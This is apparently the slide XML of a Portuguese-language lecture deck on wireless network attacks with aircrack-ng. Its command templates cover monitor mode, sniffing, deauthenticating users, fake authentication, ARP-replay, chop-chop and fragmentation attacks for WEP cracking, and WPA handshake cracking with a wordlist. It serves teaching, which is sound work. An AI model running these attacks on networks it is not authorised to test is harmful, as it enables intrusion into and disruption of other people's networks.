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4f6fb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4f6fb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4f6fb1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4f6fb1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4f6fb17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4f6fb17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54f6fb1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54f6fb1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11f226a9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11f226a9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550f8a2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550f8a2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54564156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54564156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54564156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54564156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5456418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5456418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456418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456418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5456418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5456418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4f6fb1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4f6fb1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" y="25"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="3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rancoSemFundo.pn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612" y="1454824"/>
            <a:ext cx="1431500" cy="226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ICMC BRANCO.pn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585" y="160100"/>
            <a:ext cx="2371575" cy="106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>
            <a:stCxn id="10" idx="0"/>
            <a:endCxn id="10" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75" y="25"/>
            <a:ext cx="9144000" cy="514350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>
            <a:stCxn id="10" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75" y="25"/>
            <a:ext cx="8920500" cy="51546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"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="55550" y="3535975"/>
            <a:ext cx="6165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55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padrão" type="titleOnly">
  <p:cSld name="TITLE_ONLY">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="66666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2" name="Google Shape;22;p3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subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="188825" y="4255800"/>
            <a:ext cx="7465200" cy="88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131750" y="2633775"/>
            <a:ext cx="37020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Injeção de pacotes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ARP request reply. Enquanto usa airodump-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="pt-BR" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="pt-BR" sz="2000"/>
              <a:t>(--write)</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="pt-BR" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR"/>
              <a:t>e aireplay-ng </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="pt-BR" sz="2000"/>
              <a:t>(--fakeauth)</a:t>
            </a:r>
            <a:endParaRPr i="1"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Impact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aireplay-ng --arpreplay -b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[MAC DO ALVO]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-h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[SEU MAC]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[NOME DA INTERFACE DE REDE]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Então executa o aircrak-ng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Chop chop attack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Impact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aireplay-ng --chopchop -b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[MAC DO ALVO]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-h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[SEU MAC]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[NOME DA INTERFACE DE REDE]</a:t>
            </a:r>
            <a:endParaRPr i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mpact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packetforge-ng 0 -a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[MAC DO ALVO]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-h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[SEU MAC]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-k 255.255.255.255 -l 255.255.255.255 -y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[ARQUIVO .xor DO ULTIMO PASSO]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-w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[NOME DO ARQUIVO]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mpact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aireplay-ng --interactive -r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[NOME DO ARQUIVO DO ULTIMO PASSO] [NOME DA INTERFACE DE REDE]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Injeção de pacotes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Injeção de pacotes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Fragmentation attack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Impact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aireplay-ng --fragment -b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[MAC DO ALVO]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-h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[SEU MAC]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[NOME DA INTERFACE DE REDE]</a:t>
            </a:r>
            <a:endParaRPr i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mpact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packetforge-ng 0 -a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[MAC DO ALVO]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-h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[SEU MAC]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-k 255.255.255.255 -l 255.255.255.255 -y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[ARQUIVO .xor DO ULTIMO PASSO]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-w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[NOME DO ARQUIVO]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mpact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aireplay-ng --interactive -r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[NOME DO ARQUIVO DO ULTIMO PASSO] [NOME DA INTERFACE DE REDE]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Após captura do handshake </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="pt-BR" sz="1800"/>
              <a:t>(airodump-ng) (aireplay-ng --deauth)</a:t>
            </a:r>
            <a:endParaRPr i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Impact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aircreck-ng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[HANDSHAKE FILE]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-w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[WORDLIST] [NOME DA INTERFACE DE REDE]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WPA/WPA2 crack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Instalações</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p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Wireshark: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apt-get install wireshark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Aircrack-ng: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apt-get install aircrack-ng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5198800" y="4492400"/>
            <a:ext cx="3982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descobrir o nome da sua interface de rede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 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iwconfig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 mode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p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r>
              <a:rPr lang="pt-BR"/>
              <a:t>niciar monitor mode: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Impact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 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airmon-ng start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[NOME DA INTERFACE DE REDE]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(Pode ser útil rodar os comandos)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airmon-ng check kill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Sair do monitor mode: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Impact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airmon-ng stop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[NOME DA INTERFACE DE REDE]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Sniffing packages</a:t>
            </a:r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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR"/>
              <a:t>erificar as redes existentes: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Impact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 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airodump-ng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[NOME INTERFACE DE REDE]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Sniffar alvo específico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Impact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 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airodump-ng --channel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[CHANNEL]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--bssid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[BSSID]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--write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[NOME DO ARQUIVO] [NOME DA INTERFACE DE REDE]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Verificação	</a:t>
            </a:r>
            <a:endParaRPr/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 se sua placa de rede consegue injetar pacotes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 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aireplay-ng --test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[NOME INTERFACE DE REDE]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Derrubar todos os usuários (instável)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Impact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 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aireplay-ng --deauth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[NUMERO DE PACOTES]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-a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[MAC DO AP]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[NOME DA INTERFACE DE REDE]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Derrubar um usuário </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR"/>
              <a:t>específico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Impact"/>
              <a:buChar char="-"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aireplay-ng --deauth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[NUMERO DE PACOTES]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-a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[MAC DO AP]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-c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[MAC DO ALVO]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[NOME DA INTERFACE DE REDE]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Deauthentication attack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WEP cracking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Enquanto verifica a rede específica que deseja invadir </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="pt-BR" sz="2000"/>
              <a:t>(airodump-ng)</a:t>
            </a:r>
            <a:endParaRPr i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 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aircrack-ng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[NOME DO ARQUIVO]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Fake authentication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 de podermos injetar pacotes, é preciso se conectar com a rede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Impact"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="pt-BR" sz="1800"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aireplay-ng --fakeauth 0 -a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[MAC DO ALVO]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-h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[SEU MAC]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800">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>[NOME DA INTERFACE DE REDE]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NES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